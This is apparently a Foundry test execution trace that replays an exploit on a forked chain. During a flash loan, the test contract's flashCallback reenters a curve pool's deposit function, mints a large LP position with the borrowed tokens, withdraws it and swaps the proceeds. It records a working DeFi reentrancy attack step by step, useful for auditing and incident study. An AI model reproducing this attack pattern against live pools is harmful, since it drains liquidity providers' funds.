    │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   ├─ [8221] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2313953488348953 [2.313e15])
    │   │   ├─ [7439] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2313953488348953 [2.313e15]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x46161158b1947D9149E066d6d31AF1283b2d377C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2313953488348953 [2.313e15])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x00000000000000000000000000000000000000000000000000001213246a6dbe → 0x00000000000000000000000000000000000000000000000000084a9a6c1d94d7
    │   │   │   │   @ 0x2ab45554ddc555337b8c9745aa671fca07bf60d725b8f7b13ed4b399e25648fc: 0x000000000000000000000000000000000000000000000000002463e31a1c492c → 0x000000000000000000000000000000000000000000000000001c2b5bd2692213
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [7617] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 99500000000 [9.95e10])
    │   │   ├─ [6828] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 99500000000 [9.95e10]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x46161158b1947D9149E066d6d31AF1283b2d377C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 99500000000 [9.95e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000004bff001e → 0x0000000000000000000000000000000000000000000000000000001776a8831e
    │   │   │   │   @ 0x035625c05f7d9c5fd4a9920133569f332225ace0da62b2232866e04e40817a91: 0x00000000000000000000000000000000000000000000000000000068516c41ac → 0x0000000000000000000000000000000000000000000000000000005126c2beac
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [109207] ContractTest::flashCallback(11569767441745 [1.156e13], 497500000 [4.975e8], 0x00)
    │   │   ├─ [83951] 0x46161158b1947D9149E066d6d31AF1283b2d377C::deposit(200000000000000000000000 [2e23], 1668108527 [1.668e9])
    │   │   │   ├─ [78361] 0x5fcA000F8A1eF45Fe2412A8e305FF36D8757be0f::445cc62b(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002a5a058fc295ed000000) [delegatecall]
    │   │   │   │   ├─ [5493] 0x08CD9D993840ccA86546f4Ebf166C78c7d8ff700::viewNumeraireBalanceLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 7928972720022035 [7.928e15]
    │   │   │   │   │   │   └─ ← [Return] 7928972720022035 [7.928e15]
    │   │   │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000005517ea5e2046a8632823c
    │   │   │   │   ├─ [5193] 0xc2E645C253FAf984B6Af2668798719b7c6AbAB95::viewNumeraireBalanceLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000005517ea5e2046c764adff8
    │   │   │   │   ├─ [14154] 0x08CD9D993840ccA86546f4Ebf166C78c7d8ff700::intakeNumeraireLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 1844674407370953967612232 [1.844e24]) [delegatecall]
    │   │   │   │   │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 7928972720022035 [7.928e15]
    │   │   │   │   │   │   └─ ← [Return] 7928972720022035 [7.928e15]
    │   │   │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   ├─ [6479] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 2325581395325581 [2.325e15])
    │   │   │   │   │   │   ├─ [5691] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 2325581395325581 [2.325e15]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x46161158b1947D9149E066d6d31AF1283b2d377C, value: 2325581395325581 [2.325e15])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x2ab45554ddc555337b8c9745aa671fca07bf60d725b8f7b13ed4b399e25648fc: 0x000000000000000000000000000000000000000000000000001c2b5bd2692213 → 0x00000000000000000000000000000000000000000000000000246e766f6014a0
    │   │   │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x00000000000000000000000000000000000000000000000000084a9a6c1d94d7 → 0x0000000000000000000000000000000000000000000000000000077fcf26a24a
    │   │   │   │   │   │   │   │   @ 0x6200be9415d665c0b9d12b8ae15eba82ec01318cb52c0c916659aca2d93e6373: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffff7bce563090d72
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000008431a9cf6f28d
    │   │   │   │   ├─ [13367] 0xc2E645C253FAf984B6Af2668798719b7c6AbAB95::intakeNumeraireLPRatio(500000000000000000 [5e17], 500000000000000000 [5e17], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 1844674407370956355582842 [1.844e24]) [delegatecall]
    │   │   │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   │   └─ ← [Return] 348542647980 [3.485e11]
    │   │   │   │   │   ├─ [5992] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 100000000000 [1e11])
    │   │   │   │   │   │   ├─ [5197] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x46161158b1947D9149E066d6d31AF1283b2d377C, 100000000000 [1e11]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x46161158b1947D9149E066d6d31AF1283b2d377C, value: 100000000000 [1e11])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000001776a8831e → 0x000000000000000000000000000000000000000000000000000000002e319b1e
    │   │   │   │   │   │   │   │   @ 0x035625c05f7d9c5fd4a9920133569f332225ace0da62b2232866e04e40817a91: 0x0000000000000000000000000000000000000000000000000000005126c2beac → 0x000000000000000000000000000000000000000000000000000000686f39a6ac
    │   │   │   │   │   │   │   │   @ 0x27266a933beee98a83cf358f7efd3bce1608669ec0990dc938739b848f5d91f1: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffe8b78917ff
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000174876e800
    │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 387134878542173576823470 [3.871e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 7: 0x000000000000000000000000000000000000000000011dbb5599b9c3c67a850c → 0x000000000000000000000000000000000000000000016fb5f54c4360b0f187ba
    │   │   │   │   │   @ 0x27266a933beee98a83cf358f7efd3bce1608669ec0990dc938739b848f5d91f1: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffe8b78917ff
    │   │   │   │   │   @ 0x6200be9415d665c0b9d12b8ae15eba82ec01318cb52c0c916659aca2d93e6373: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffff7bce563090d72
    │   │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 0x0000000000000000000000000000000000000000000051fa9fb2899cea7702ae
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000051fa9fb2899cea7702ae000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000008431a9cf6f28d000000000000000000000000000000000000000000000000000000174876e800
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 0x0000000000000000000000000000000000000000000051fa9fb2899cea7702ae
    │   │   │   └─ ← [Return] 387134878542173576823470 [3.871e23], [2325581395325581 [2.325e15], 100000000000 [1e11]]
    │   │   ├─  storage changes:
    │   │   │   @ 36: 0 → 0x0000000000000000000000000000000000000000000051fa9fb2899cea7702ae
    │   │   └─ ← [Stop]
    │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   └─ ← [Return] 10254554115347616 [1.025e16]
    │   │   └─ ← [Return] 10254554115347616 [1.025e16]
    │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   └─ ← [Return] 448542647980 [4.485e11]
    │   │   └─ ← [Return] 448542647980 [4.485e11]
    │   ├─ [12221] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::transfer(0x27E843260c71443b4CC8cB6bF226C3f77b9695AF, 11627906976628 [1.162e13])
    │   │   ├─ [11439] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::transfer(0x27E843260c71443b4CC8cB6bF226C3f77b9695AF, 11627906976628 [1.162e13]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x46161158b1947D9149E066d6d31AF1283b2d377C, to: 0x27E843260c71443b4CC8cB6bF226C3f77b9695AF, value: 11627906976628 [1.162e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x7936ff6e6915afdc929c43d19aaa28aaddd353ffbeae51fe910e8dd486725cdd: 0x00000000000000000000000000000000000000000000000000000e7880cff06f → 0x0000000000000000000000000000000000000000000000000000190bd613bbe3
    │   │   │   │   @ 0x2ab45554ddc555337b8c9745aa671fca07bf60d725b8f7b13ed4b399e25648fc: 0x00000000000000000000000000000000000000000000000000246e766f6014a0 → 0x000000000000000000000000000000000000000000000000002463e31a1c492c
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [11617] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(0x27E843260c71443b4CC8cB6bF226C3f77b9695AF, 500000000 [5e8])
    │   │   ├─ [10828] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(0x27E843260c71443b4CC8cB6bF226C3f77b9695AF, 500000000 [5e8]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0x46161158b1947D9149E066d6d31AF1283b2d377C, to: 0x27E843260c71443b4CC8cB6bF226C3f77b9695AF, value: 500000000 [5e8])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x035625c05f7d9c5fd4a9920133569f332225ace0da62b2232866e04e40817a91: 0x000000000000000000000000000000000000000000000000000000686f39a6ac → 0x00000000000000000000000000000000000000000000000000000068516c41ac
    │   │   │   │   @ 0x786b0e645aa5b3c5ca100bdff438c81600323479b05fbfe52393cd4c6bbecc86: 0x0000000000000000000000000000000000000000000000000000000abc699d92 → 0x0000000000000000000000000000000000000000000000000000000ada370292
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 2313953488348953 [2.313e15], param3: 99500000000 [9.95e10], param4: 11627906976628 [1.162e13], param5: 500000000 [5e8])
    │   ├─  storage changes:
    │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x00000000000000000000000000000000000000000000000000001213246a6dbe → 0x00000000000000000000000000000000000000000000000000084a9a6c1d94d7
    │   │   @ 0x7936ff6e6915afdc929c43d19aaa28aaddd353ffbeae51fe910e8dd486725cdd: 0x00000000000000000000000000000000000000000000000000000e7880cff06f → 0x0000000000000000000000000000000000000000000000000000190bd613bbe3
    │   │   @ 36: 0 → 0x0000000000000000000000000000000000000000000051fa9fb2899cea7702ae
    │   └─ ← [Stop]
    ├─ [91104] 0x46161158b1947D9149E066d6d31AF1283b2d377C::withdraw(387134878542173576823470 [3.871e23], 1668108527 [1.668e9])
    │   ├─ [85776] 0x5fcA000F8A1eF45Fe2412A8e305FF36D8757be0f::44fd3db0(00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000051fa9fb2899cea7702ae) [delegatecall]
    │   │   ├─ [22434] 0x08CD9D993840ccA86546f4Ebf166C78c7d8ff700::viewNumeraireBalance(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   ├─ [15643] 0x91b99C9b75aF469a71eE1AB528e8da994A5D7030::latestRoundData() [staticcall]
    │   │   │   │   ├─ [7410] 0x156710f56dC5F0C022505A9ffE95b0b51A7c5c9A::latestRoundData() [staticcall]
    │   │   │   │   │   └─ ← [Return] 458, 6417, 1668092435 [1.668e9], 1668092435 [1.668e9], 458
    │   │   │   │   └─ ← [Return] 18446744073709552074 [1.844e19], 6417, 1668092435 [1.668e9], 1668092435 [1.668e9], 18446744073709552074 [1.844e19]
    │   │   │   ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   │   │   └─ ← [Return] 10242926208370988 [1.024e16]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000a0788932580c308feac42
    │   │   ├─ [22134] 0xc2E645C253FAf984B6Af2668798719b7c6AbAB95::viewNumeraireBalance(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   ├─ [15643] 0x8fFfFfd4AfB6115b954Bd326cbe7B4BA576818f6::latestRoundData() [staticcall]
    │   │   │   │   ├─ [7410] 0x789190466E21a8b78b8027866CBBDc151542A26C::latestRoundData() [staticcall]
    │   │   │   │   │   └─ ← [Return] 735, 99983254 [9.998e7], 1668101663 [1.668e9], 1668101663 [1.668e9], 735
    │   │   │   │   └─ ← [Return] 36893488147419103967 [3.689e19], 99983254 [9.998e7], 1668101663 [1.668e9], 1668101663 [1.668e9], 36893488147419103967 [3.689e19]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0x46161158b1947D9149E066d6d31AF1283b2d377C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   │   └─ ← [Return] 448042647980 [4.48e11]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000006d5df9e66ec9e236c15d2
    │   │   ├─ [15070] 0x08CD9D993840ccA86546f4Ebf166C78c7d8ff700::outputNumeraire(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2703161934845382889114742 [2.703e24]) [delegatecall]
    │   │   │   ├─ [3143] 0x91b99C9b75aF469a71eE1AB528e8da994A5D7030::latestRoundData() [staticcall]
    │   │   │   │   ├─ [1410] 0x156710f56dC5F0C022505A9ffE95b0b51A7c5c9A::latestRoundData() [staticcall]
    │   │   │   │   │   └─ ← [Return] 458, 6417, 1668092435 [1.668e9], 1668092435 [1.668e9], 458
    │   │   │   │   └─ ← [Return] 18446744073709552074 [1.844e19], 6417, 1668092435 [1.668e9], 1668092435 [1.668e9], 18446744073709552074 [1.844e19]
    │   │   │   ├─ [8221] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2283601404332242 [2.283e15])
    │   │   │   │   ├─ [7439] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2283601404332242 [2.283e15]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x46161158b1947D9149E066d6d31AF1283b2d377C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2283601404332242 [2.283e15])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x0000000000000000000000000000000000000000000000000000077fcf26a24a → 0x0000000000000000000000000000000000000000000000000008246c31aa2b1c
    │   │   │   │   │   │   @ 0x2ab45554ddc555337b8c9745aa671fca07bf60d725b8f7b13ed4b399e25648fc: 0x000000000000000000000000000000000000000000000000002463e31a1c492c → 0x000000000000000000000000000000000000000000000000001c46f6b798c05a
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000081cec628388d2
    │   │   ├─ [14466] 0xc2E645C253FAf984B6Af2668798719b7c6AbAB95::outputNumeraire(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1842309544867711739284135 [1.842e24]) [delegatecall]
    │   │   │   ├─ [3143] 0x8fFfFfd4AfB6115b954Bd326cbe7B4BA576818f6::latestRoundData() [staticcall]
    │   │   │   │   ├─ [1410] 0x789190466E21a8b78b8027866CBBDc151542A26C::latestRoundData() [staticcall]
    │   │   │   │   │   └─ ← [Return] 735, 99983254 [9.998e7], 1668101663 [1.668e9], 1668101663 [1.668e9], 735
    │   │   │   │   └─ ← [Return] 36893488147419103967 [3.689e19], 99983254 [9.998e7], 1668101663 [1.668e9], 1668101663 [1.668e9], 36893488147419103967 [3.689e19]
    │   │   │   ├─ [7617] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 99888527878 [9.988e10])
    │   │   │   │   ├─ [6828] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 99888527878 [9.988e10]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0x46161158b1947D9149E066d6d31AF1283b2d377C, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 99888527878 [9.988e10])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000002e319b1e → 0x0000000000000000000000000000000000000000000000000000001770039524
    │   │   │   │   │   │   @ 0x035625c05f7d9c5fd4a9920133569f332225ace0da62b2232866e04e40817a91: 0x00000000000000000000000000000000000000000000000000000068516c41ac → 0x000000000000000000000000000000000000000000000000000000510f9a47a6
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000001741d1fa06
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 387134878542173576823470 [3.871e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0x0000000000000000000000000000000000000000000051fa9fb2899cea7702ae → 0
    │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0x0000000000000000000000000000000000000000000000000000077fcf26a24a → 0x0000000000000000000000000000000000000000000000000008246c31aa2b1c
    │   │   │   @ 7: 0x000000000000000000000000000000000000000000016fb5f54c4360b0f187ba → 0x000000000000000000000000000000000000000000011dbb5599b9c3c67a850c
    │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000000002e319b1e → 0x0000000000000000000000000000000000000000000000000000001770039524
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000081cec628388d20000000000000000000000000000000000000000000000000000001741d1fa06
    │   ├─  storage changes:
    │   │   @ 7: 0x000000000000000000000000000000000000000000016fb5f54c4360b0f187ba → 0x000000000000000000000000000000000000000000011dbb5599b9c3c67a850c
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000081cec628388d20000000000000000000000000000000000000000000000000000001741d1fa06
    ├─ [1615] 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [836] 0x78fe13802Ba4E487F69c87850eA557CfC292b472::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 2291846921988892 [2.291e15]
    │   └─ ← [Return] 2291846921988892 [2.291e15]
    ├─ [47305] 0xE592427A0AEce92De3Edee1F18E0157C05861564::exactInputSingle(ExactInputSingleParams({ tokenIn: 0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52, tokenOut: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, fee: 500, recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 1668108467 [1.668e9], amountIn: 1145923460994446 [1.145e15], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
